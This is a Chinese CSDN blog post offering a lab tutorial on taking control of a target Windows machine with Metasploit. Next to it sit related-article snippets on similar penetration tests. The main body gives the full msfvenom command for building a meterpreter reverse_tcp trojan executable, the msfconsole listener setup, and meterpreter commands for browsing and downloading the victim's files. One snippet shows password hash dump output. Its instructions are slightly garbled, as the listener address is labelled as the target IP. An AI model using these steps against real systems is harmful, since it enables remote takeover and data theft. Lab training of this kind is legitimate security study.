Metasploit渗透测试(获取靶机控制权)

最新推荐文章于 2023-02-20 18:40:29 发布
最新推荐文章于 2023-02-20 18:40:29 发布
阅读量516 收藏 3
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51926773/article/details/121195239
版权

一,打开kali生成一个被控端:

输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe

这是你会发现你的kali会多出一个文件:

二,然后在kali输入msfconsole:

然后输入set payload windows/meterpreter/reverse_tcp,回车zai

再输入     set lhost 靶机ip
                set lport 5000

执行“exploit”开启监听,等待被控端打开远程控制软件连接到此处
如果被控端打开了前面我们传过去的控制木马,监听端会有如下显示:



 三,控制靶机。

查看目标计算机的文件信息,并下载文件文件

Ls //查看

Download 文件名 //下载文件

然后就能在kali文件系统看见你下载的文件了。

鸿^
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Kali上的Metasploit获取ssh登录到靶机权限
WEL测试
03-30 7235
前置条件 靶机metasploitable2 靶机IP:192.168.88.137 初始密码是:msfadmin/msfadmin kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用Metasploit获取mysql登录密码 进入Metasploit控制台执行命令: msfconsole ...
Metasploit之Hash值传递渗透
a1b2c3是弱口令
12-06 3096
讲述Metasploit知道内网机器密码或者是不知道密码能够拿到shell获取到hash值的两种渗透测试。 测试环境 目标机: Windows 7 Ultimate 192.168.1.9 攻击机: Linux 4.6.0-kali1-amd64 192.168.1.31 I HAVE PASS 攻击机姿势: msfconsole use exploit/windows/smb/psex...
Metasploitable靶机渗透
qq_51926773的博客
11-01 2949
1.导入命令ifconfig得到自己的本机ip(即攻击机) 2.在kali打开nmap,输入自己的本机ip范围,得到在同一局域网的内存活的主机。 3.找到21端口,图片显示ftp。 4.接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip 5.然后使用浏览器来浏览http服务的信息,在网址栏输入目标靶机ip 6.得到网页,网页给出信息,登录靶机的账号密码 7.然后输入telnet ip 登录靶机 8.之后再调出控制栏输入msfconsole,连接靶机.
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
保持微笑的博客
01-14 4845
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法) 干货干货干货
通过metasploit工具渗透Metasploitable 2靶机
热门推荐
朝歌
04-24 1万+
    首先,是Metasploitable 2的在本地的安装,    下载地址:https://sourceforge.net/projects/metasploitable/?source=typ_redirect。下载过后解压。会有四个文件。            用VM打开.vmsd文件。如果遇见需要配置文件什么的,就用VM打开vmx文件。        就会显示下面:打开虚拟机账号密码都...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
当找到可利用的漏洞时,Metasploit可以尝试利用这些漏洞,获得目标系统的控制权。利用过程中,需要密切关注输出信息,以便在成功或失败时采取适当的行动。 5. **后渗透操作** 成功渗透后,Metasploit提供了一系列...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限
Metasploit实战三之——使用Metasploit获取目标的控制权
冰河的专栏
01-23 3207
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86607498 攻击机: Kali 192.168.175.128 靶机: Win2012 R2 192.168.175.130 在上一篇《对威胁建模(附加搭建CVE:2014-6287漏洞环境)》中,我们确定了目标系统的漏洞和Metasploit的可利用模块,接下来我们就真...
渗透测试环境搭建与metasploit工具使用
m0_64338210的博客
01-13 514
-Metasploit配置使用2 实验目的 熟悉ms17-010漏洞的原理及利用方法,掌握Metasploit的配置使用方法。 实验环境 操作机:Kali2018-TS (1)操作系统:Kali Linux 2018.4 (2)登录账号密码:操作系统帐号root,密码Sangfor!7890 靶机 pt-env (1)操作系统:Windows (2)安装的应用软件:PHPStudy 2013、DVWA漏洞网站环境 (3)登录账号密码:操作系统帐号Administrator,密码Sangf
渗透测试:DC-1靶机
Ciyaso的博客
08-06 316
一、扫描获取靶机ip 方法一 1.使用 ip add 查看kali ip 192.168.203.130 2.用nmap扫描192.168.203.0/24以获取靶机ip nmap -sP 192.168.203.0/24 得到ip 192.168.203.138 方法二 arp-scan -l 得到ip 192.168.203.138 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.138 可以看到,开放了三个端口22、80、111 其中80端口中存
网安实训(九)| 利用Metasploit工具和Ms17-010漏洞进行控制权获取
朔方鸟的博客
02-19 3534
MS17-010是微软的一个系统漏洞,通过该漏洞,攻击者可获取靶机的最高shell权限,从而进行一系列的操作。 本实验将利用Metasploit进行MS17-010漏洞的复现和攻击。
metasploit获取系统密码hash值
天元喜羊羊的博客
04-27 6043
meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY e503dc5ce6734d7f11ccecf5623b0f1c... [*] Obtaining the user list and keys... [*] Decrypting user keys
Linux基础命令精讲
最新发布
小小byg
02-20 538
Linux基础命令
msfvenom制作主控与被控端
angleoldhen的专栏
07-28 360
msfvenom如何制作主控与被控端 ,如何编码,如何使用upx加壳
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)
weixin_51803729的博客
02-12 5234
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值